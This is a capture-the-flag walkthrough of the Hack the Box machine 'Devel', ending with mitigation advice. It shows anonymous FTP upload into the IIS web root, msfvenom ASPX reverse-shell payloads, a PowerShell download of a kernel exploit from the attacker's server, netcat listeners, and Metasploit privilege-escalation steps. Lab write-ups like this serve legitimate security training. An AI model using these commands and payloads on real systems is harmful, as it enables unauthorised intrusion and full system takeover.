Hack the Box — Devel (1)

CurlS
7 min read · Jun 9, 2020

HTB is a platform that provides a large number of vulnerable virtual machines. The goal is to find vulnerabilities, elevate privileges and finally capture two flags, a user flag and a root flag. As I am planning to take the OSCP exam, my focus is to exploit some HTB machines as preparation.

As I tend to remember things more easily when I write them down, I decided to summarize the walkthroughs as documentation for later reference, and for anyone who is interested in this topic.

This is my first HTB writeup!

Summary

This machine allows anonymous FTP login, meaning that anyone can log in with the username anonymous and any string as a password and access the files on the server. Exposing that to the whole internet is already risky; giving the anonymous user write access is worse. Normally the anonymous account should have limited rights and restricted operations, which is not the case here. Because the FTP root is the same directory as \inetpub\wwwroot, the default IIS folder for published web content, the anonymous user can upload an ASPX file and have IIS execute it simply by requesting it in a browser.

Furthermore, the machine is missing several Windows kernel patches, which allows privileges to be escalated.

1. Reconnaissance

Enumeration

To identify vulnerabilities and proceed with exploitation, a bit of port scanning is needed to collect as much information as possible about the target. I start with an Nmap scan to get an overview of open ports and running services.

nmap -A -T4 -v 10.10.10.5 -oX nmap/scan.xml --webxml

-A: Enable OS detection, version detection, script scanning, and traceroute
-v: Increase verbosity level
-T4: Faster execution (default is T3)
-oX: Save output as XML
--webxml: Reference the Nmap.org XSL stylesheet so the XML file renders in a browser

Scan Result

Nmap xml output

Open Ports Analysis

Port 80: Microsoft IIS 7.5; Nmap's http-methods script flags potentially risky methods
I navigated to http://10.10.10.5 and checked the start page and the files mentioned in the Nmap result. I found nothing interesting in the HTML pages (iisstart.htm is the start page).

Port 21: Anonymous FTP allowed
This finding from the Nmap scan looks very promising. Anonymous FTP is allowed, so anyone can log into the FTP server with anonymous as the user and any string as the password and read the files. The FTP root contains a directory aspnet_client, which looks like a default ASP.NET folder that is obsolete as of .NET 4.0. The fact that the FTP listing shows the same files the web server serves is the first hint that the FTP root and the web root are one and the same directory.

The first step is to test whether file upload to the FTP server is possible. If it is, we can upload a payload and execute it through the browser to get a shell.

2. Gain Access

  1. Log in to the FTP server as anonymous.
  2. Check the directory structure and files. As outlined above, the files do not contain any helpful information.
  3. Check whether upload works via the put command: create a simple .txt file, upload it and try to access it at http://10.10.10.5/<filename>.txt. This is indeed successful, so the next step is to upload the malicious payload.
ftp login and file upload
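
The upload test from steps 1 to 3, written out as a script. This is an added example, not code from the original writeup: it lists the anonymous FTP root, checks which of those names the web server also serves (the tell that the FTP root is \inetpub\wwwroot), then uploads a random text canary, fetches it over HTTP and deletes it again. The host, ports and the anonymous password string are assumptions taken from the post; only the Python standard library is used, and nothing touches the network on import.

```python
"""Check whether an anonymous-FTP root overlaps a web root.

Added example, not part of the original writeup. Assumes the target
from the post (10.10.10.5, FTP on 21, HTTP on 80). Nothing runs on
import; call run(HOST) or execute the file.
"""
import ftplib
import http.client
import io
import secrets

HOST = "10.10.10.5"                 # assumption: the target from the post
ANON = ("anonymous", "anon@example.com")   # any string works as password


def ftp_listing(host, creds=ANON):
    """Return the file names visible in the anonymous FTP root."""
    with ftplib.FTP(host, timeout=10) as ftp:
        ftp.login(*creds)
        return ftp.nlst()


def http_status(host, name):
    """Return the HTTP status code for /name (0 on connection error)."""
    conn = http.client.HTTPConnection(host, 80, timeout=10)
    try:
        conn.request("HEAD", "/" + name)
        return conn.getresponse().status
    except OSError:
        return 0
    finally:
        conn.close()


def served_over_http(listing, status_of):
    """Pure helper: names from the FTP listing that the web server serves.

    `status_of` maps a name to its HTTP status code, so the logic can be
    tested without a network.
    """
    return sorted(n for n in listing if status_of.get(n, 0) == 200)


def canary_probe(host, creds=ANON):
    """Upload a random canary, fetch it over HTTP, then delete it.

    Returns (writable, served): whether anonymous FTP accepted the
    upload, and whether exactly the same bytes came back over HTTP.
    """
    name = "canary-%s.txt" % secrets.token_hex(4)
    body = secrets.token_bytes(16)
    with ftplib.FTP(host, timeout=10) as ftp:
        ftp.login(*creds)
        try:
            ftp.storbinary("STOR " + name, io.BytesIO(body))
        except ftplib.error_perm:
            return False, False
        try:
            conn = http.client.HTTPConnection(host, 80, timeout=10)
            conn.request("GET", "/" + name)
            resp = conn.getresponse()
            served = resp.status == 200 and resp.read() == body
            conn.close()
        except OSError:
            served = False
        finally:
            try:
                ftp.delete(name)          # do not leave the canary behind
            except ftplib.error_perm:
                pass                      # DELE refused: note it and move on
    return True, served


def verdict(writable, served):
    """Pure helper: summarise the two probe results."""
    if writable and served:
        return "anonymous FTP is writable AND its root is the web root: code execution"
    if writable:
        return "anonymous FTP is writable but uploads are not web-served"
    return "anonymous FTP is read-only"


def run(host=HOST):
    listing = ftp_listing(host)
    overlap = served_over_http(listing, {n: http_status(host, n) for n in listing})
    print("FTP root:", listing)
    print("also reachable over HTTP:", overlap)
    print(verdict(*canary_probe(host)))


if __name__ == "__main__":
    run()
```

The same script doubles as a configuration check for the FTP root / web root overlap discussed in the summary: on a correctly configured server the overlap list is empty and the canary is never served.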

Now that we know FTP login and upload work, we can create our own reverse shell, upload it and execute it to get access to the machine via a reverse shell back to our attacker machine.

Reverse Shell

We can use msfvenom to create a custom payload. Make sure you understand the various reverse-shell payloads and choose the right one. For example, select windows/meterpreter/reverse_tcp only if you are going to catch it with Metasploit's handler. Understand the difference between staged and stageless payloads: a staged payload (windows/shell/reverse_tcp, with a slash) only contains a small stager that connects back and waits for the handler to push the rest, whereas a stageless payload (windows/shell_reverse_tcp, with an underscore) carries the whole shell. In our case we use the non-Meterpreter, stageless windows/shell_reverse_tcp to generate the ASPX payload, which gives us a shell with a basic netcat listener. The staged version will not work with the netcat listener.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=5555 -f aspx > test.aspx

LHOST is the attacking machine (ip address | grep tun shows the HTB VPN address) and LPORT is the port we will listen on. The result is our backdoor as an ASPX page, not a standalone binary: IIS compiles and runs it when it is requested. Upload this file to the FTP root as shown above.

ftp 10.10.10.5
Name: anonymous
ftp> put test.aspx

To catch the shell, we start a netcat listener on the attacking machine and then visit http://10.10.10.5/test.aspx.

nc -nlvp 5555

Low Privilege Shell

As soon as we visit http://10.10.10.5/test.aspx, IIS compiles and runs the page and the payload connects back. In the listener we see a shell running as iis apppool\web, the identity of the IIS application pool.

low priv shell

Our next goal is to escalate privileges. Windows Exploit Suggester compares a target's patch level with Microsoft's security bulletin database and lists public exploits and Metasploit modules for bulletins that appear to be unpatched. All it needs is the output of systeminfo, so I saved that to a text file.

systeminfo output

3. Elevation of Privilege

We need to elevate our privileges to NT AUTHORITY\SYSTEM.

As mentioned, I am using Windows Exploit Suggester to find which public exploits exist. Its only input is the systeminfo output from the Windows machine. Before running the command below, make sure the dependencies are installed (as explained on the GitHub page) and fetch a current bulletin database with ./windows-exploit-suggester.py --update; that download is the .xls file passed to --database. Keep in mind that the tool infers exposure from the OS version and the listed hotfixes and never tests anything, so expect false positives.

./windows-exploit-suggester.py --database <xls file> --systeminfo systeminfo.txt
available exploits (E: public exploit; M: Metasploit module)
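
What the suggester does, in miniature. This is an added example, not the tool's own code and not part of the original writeup: it parses the systeminfo text and checks a small embedded bulletin table against the kernel version and the installed hotfixes. The table holds only the three bulletins named in this writeup; the KB numbers are taken from the corresponding Microsoft bulletins and should be verified against a current database before relying on them. The sample systeminfo text is constructed, and unlike the real tool the check ignores service-pack level and architecture.

```python
"""What Windows Exploit Suggester does, in miniature.

Added example, not part of the original writeup and not the tool's
code. Parses `systeminfo` output and reports bulletins whose fix is
not installed. KB numbers per the Microsoft bulletins (verify them);
the sample systeminfo text below is constructed.
"""
import re

# bulletin -> (KB that fixes it, affected kernel versions, short description)
# Service pack and architecture are deliberately ignored here.
BULLETINS = {
    "MS10-015": ("KB977165", {"5.1", "5.2", "6.0", "6.1"},
                 "KiTrap0D (NT VDM, x86 only)"),
    "MS10-059": ("KB982799", {"6.0", "6.1"},
                 "Chimichurri (Tracing Feature for Services)"),
    "MS11-011": ("KB2393802", {"5.1", "5.2", "6.0", "6.1"},
                 "Windows kernel elevation of privilege"),
}

# Constructed sample in systeminfo's layout; one hotfix present so the
# filtering is visible.
SAMPLE_SYSTEMINFO = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: KB977165
"""


def parse_systeminfo(text):
    """Return (major.minor kernel version, set of installed KB numbers)."""
    m = re.search(r"^OS Version:\s+(\d+\.\d+)", text, re.M)
    version = m.group(1) if m else ""
    kbs = set(re.findall(r"\[\d+\]:\s*(KB\d+)", text))
    return version, kbs


def missing_patches(version, installed_kbs, bulletins=BULLETINS):
    """Bulletins that apply to this kernel version and whose fix is absent."""
    return sorted(
        b for b, (kb, affected, _) in bulletins.items()
        if version in affected and kb not in installed_kbs
    )


def report(text, bulletins=BULLETINS):
    """Human-readable summary in the spirit of the tool's [E] lines."""
    version, kbs = parse_systeminfo(text)
    lines = ["OS version %s, %d hotfix(es) installed" % (version, len(kbs))]
    for b in missing_patches(version, kbs, bulletins):
        kb, _, desc = bulletins[b]
        lines.append("[E] %s (%s not installed): %s" % (b, kb, desc))
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_SYSTEMINFO))
```

The patch-level heuristic is also why a listed exploit can still fail, as the post sees with MS11-011 further down: a bulletin being unpatched says nothing about whether a particular exploit binary works on that exact build.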

We are interested in the public exploits (E).

To make a quick decision on which exploit to try, I chose one that is marked as public and listed at https://github.com/SecWiki/windows-kernel-exploits (they provide compiled versions). MS11-011 did not work, so I used MS10-059, which worked like a charm. The description gives good insight into whether elevation of privilege is possible.

For this challenge I used the compiled version from this git repo. Outside a lab, precompiled exploit binaries from a third party deserve suspicion: build them from source you have reviewed, and verify the hash of whatever you transfer to the target.

Transfer File to victim machine

There are various ways to transfer the file to the victim machine. Because the target runs Windows, wget, nc, etc. are not available ("is not recognized as an internal or external command"), so we use what is already there: PowerShell's WebClient, or the FTP server itself.

Via Python's built-in HTTP server

1. Get the exploit binary from the source mentioned above and save it locally.
2. On the attacking machine, start the HTTP server in the directory where the file is located. The default port is 8000 if none is given. (The module below is Python 2; on Python 3 use python3 -m http.server 9005.)
python -m SimpleHTTPServer 9005
3. On the victim machine, download it with PowerShell's WebClient:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.14:9005/Chimichurri.exe','c:/Users/Public/test.exe')"
4. Start a netcat listener locally:
nc -nlvp 4444
5. Execute the exploit binary on the victim machine (from c:\Users\Public, or with its full path), passing the listener's address and port:
test.exe 10.10.14.14 4444
Execution of exploit (MS10–059)

In the listener we see a new shell running as nt authority\system.

Via FTP

We can also upload the exploit binary via FTP and then change into the web root on the victim machine.

1. Download the executable binary from the git repo mentioned above.
2. Upload it via FTP, switching to binary mode first (in ASCII mode the client translates bytes that look like line endings and corrupts the executable):
ftp 10.10.10.5
- User: anonymous
- Password: any string
- ftp> binary
- ftp> put chimichurri.exe
3. On the victim machine, change into the web root:
cd c:\inetpub\wwwroot
4. Start a netcat listener on the local machine:
nc -nlvp 4445
5. Execute the binary on the victim machine:
chimichurri.exe 10.10.14.14 4445

\inetpub\wwwroot is the default directory for the web pages and content that IIS publishes; \inetpub itself is the default folder of Microsoft Internet Information Services (IIS). Note that anything dropped there is also reachable over HTTP, so the exploit binary is downloadable by anyone until it is deleted again.

Flags

Now that we have escalated our privileges, we can read the root and user flag files.

c:\>type c:\Users\Administrator\Desktop\root.txt.txt                
e621a.....72b4b
c:\>type c:\Users\babis\Desktop\user.txt.txt
9ecdd.....cb3e8

Metasploit

Whenever possible I will try to solve HTB challenges without using Metasploit. This chapter is a quick step-by-step tutorial, in case someone is interested in walking through it that way.

1. Use msfvenom to create the payload. This time the Meterpreter payload (windows/meterpreter/reverse_tcp) is the right choice, because Metasploit's handler will deliver the stage:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=4446 -f aspx -o test2.aspx
2. Upload test2.aspx via FTP to the server:
ftp 10.10.10.5
- User: anonymous
- Password: any string
- ftp> put test2.aspx
3. Start Metasploit and configure the handler:
msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.14.14
msf5 exploit(multi/handler) > set lport 4446
msf5 exploit(multi/handler) > run
4. Visit http://10.10.10.5/test2.aspx.
5. A Meterpreter session opens:
[*] Started reverse TCP handler on 10.10.14.14:4446
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.14:4446 -> ...)
6. Background the session and run the local exploit suggester against it:
meterpreter > background
msf5 > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
msf5 post(multi/recon/local_exploit_suggester) > run
overview of available exploit modules
7. Pick one of the suggested local exploits, here MS10-015 (KiTrap0D), and run it against the session:
msf5 > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 1
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.14
msf5 exploit(windows/local/ms10_015_kitrap0d) > run
Metasploit exploit priv esc

Mitigation

  • Do not allow anonymous FTP login at all if it is not needed.
  • If anonymous FTP is necessary, make it read-only, and give write access only to a small number of authenticated users.
  • The FTP root must not be the web server root (\inetpub\wwwroot on IIS); otherwise any uploaded .aspx file becomes server-side code that IIS executes on request.
  • Install updates and patches when they become available. This removes the kernel vulnerabilities (MS10-015, MS10-059 and MS11-011 here) that a malicious actor can use to elevate privileges.

CurlS

Working in Infosec. Interested in many things, from technical perspective -> security, ctfs, coding, reverse engineering,… and in general -> love life. She.